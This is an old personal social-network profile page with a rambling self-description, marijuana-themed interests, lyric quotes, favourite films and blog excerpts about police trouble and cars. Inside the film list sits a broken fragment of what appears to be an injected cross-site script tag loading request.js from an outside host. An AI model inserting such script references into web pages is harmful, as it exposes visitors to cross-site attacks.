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About Me

(o_0) whattabout me man? oxygen, you Leave 'Lone Leave me 'Lone before i Lock you in that LittLe bitty box again... oh Lighten up girL its suga free! occams razor beLLowed beLLigerentLY... evidentLy its fucken ELEMENTary... weLL heres where it gets a LiL fuzzy, as ambidexterous Like an introverted extrovert. the hemispheres of your brain cohesiveLy fLawLess... regardLess time isnt reaLLy reLative. simpLy cuz there is no 'now' cuz its instants and time IS constant... *go ahead give it try. as the electroLytes in my brain transist and manifest into soLid, Liquid and gaseous matter aLongside of the mass eLements into this eLaborate show for 'MY' viewing pLeasure... its agrued by science that no one has successfuLLy demonstrated time traveL, but no one has been abLe to ruLe it out either... ( X_x) ? ehh... at this point youre thinkin to yourseLf 'whatta ferking geek, eh!' you wanna know about me? weLL you cant handLe the about me son! good would not exist if there were no bad... so what now jackass? (c_C ) to concLude this about me i beLieve that our ancestors' memories are passed on through our Levis jeans... hee haw! [v_V ] weLL im aLL about having fun making fun being fun... having my way with Life as i traveL thru air, time and space on the earth... so everyone make sure your seats and tray tabLes are at their upright position and enjoy the high! ok there is no concLusion just a Light summarization (0_o) yeah i just made aLL that up... hahaha i got one crazyass imaginATION huh? 'if the worLds at Large, why shouLd i remain?' -the shy rodent [ H_h]

My Interests

Tetra Hydro CannibanoL the physioLogicaLLy active chemicaL C21H30O2 from hemp pLant resin that is the chief intoxicant in marijuana most commonLy referred to as (thc)
and interesting things

I'd like to meet:

friends, new friends, girLs/Ladies, reLatives i've yet to meet, new up and coming/underground bands/groups, the homies who rest in peace, tiLL we meet again, may the angeLs heLp you Lead the way, enemies... shit, i dont give a fuck, get at me... otherwise get bent... on the other hand im very sociabLe...

keep my name up out your mouth and we can keep it tha same
fuck friends... i need a homie that know me when aLL these muthafucken cops be on me...

network of individuaLs poorLy retrofitted as a popuLarity contest...


'With all this extra stressin' tha question I wonder is after death I feel my last breath when will I finaly get to rest from this supression they punish tha people that's askin questions and those that possess steal from tha ones without possesions tha message I stress to make it stop study your lessons don't settle for less even tha genius asks questions be greatful for blessins don't ever change keep your essense tha power is in tha people and tha politics we address always do your best don't let this pressure make ya panic and when ya get stranded and things don't go tha way ya plannd it' R.I.P ~Pac 'just puLL out the nine, pop in the cLip and Let one sLip, hmph... into these crazy fooLs' R.I.P brad nowell of SUBLIME 'music makes me high' R.I.P mr cheeks of LOST boyz


fear and Loathing in Las vegas... psychodeLic.- - haLf baked, viewed over 50 times- - what dreams may come- -casino (shroomed out) -0- manga- - japanime- - dBz/gt- - cowboy bebop the movie- - metropoLis- - akira- - gowcaizer- - yotoden/wrath of the ninja- - X- - shaun of the dead funny as shit... Like nasty smeLLy shit hahah .... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("...mov.r{}");}..


woLverine- hes been through heLL aLL his Life and, Like a vigiLante, finds his own suitabLe punishment for these dirty LowLifes.....

My Blog

fuck tha cops

yeah i fought tha law and tha law half way won but i still came out on top... bitches didtnt get all my $$$$ back but got most of it! damn fuckers still got me for a modified exhaust on a car that ain...
Posted by -Lj on Fri, 10 Feb 2006 03:52:00 PST

i see death around tha corner

happened so fast, thinkin to myself 'what tha fuck!?' first thought was get everyone out tha fucken car, even though i was all bloody the adrenaline fueled me to take charge while shock had everyone d...
Posted by -Lj on Thu, 02 Feb 2006 12:00:00 PST


my folks and i went to see the ringling bros/ barnum & bailey show... and man that show was fuckin amazing! from the crazy fucks swinging around in the ceiling to balancing chicks on a 80 fo...
Posted by -Lj on Thu, 25 Aug 2005 07:35:00 PST


Which DragonballZ Character are you?...
Posted by -Lj on Mon, 01 Jan 1900 12:00:00 PST


yeah so i got rid of my eg hatch (R.I.P) and picked up my 2nd gen N/A (for now) and i got the ragtop... oh shit summers on its way by then ill have her runnin right... ill get some pics of her on...
Posted by -Lj on Mon, 01 Jan 1900 12:00:00 PST

one day hawk

damn indecisive-ass one day mohawk has pretty coolshoulda kept it for atleast the week but oh my life... from a full head of hair to no hair in this freaggin weather sucksbeanies also suck when you a...
Posted by -Lj on Mon, 01 Jan 1900 12:00:00 PST

2nd final

A second final warning... STOP... you can tell bullshit from the smell. whats got me heated... Corupted Corporations FUck a j.o.b. just.over.broke heeeh...
Posted by -Lj on Mon, 01 Jan 1900 12:00:00 PST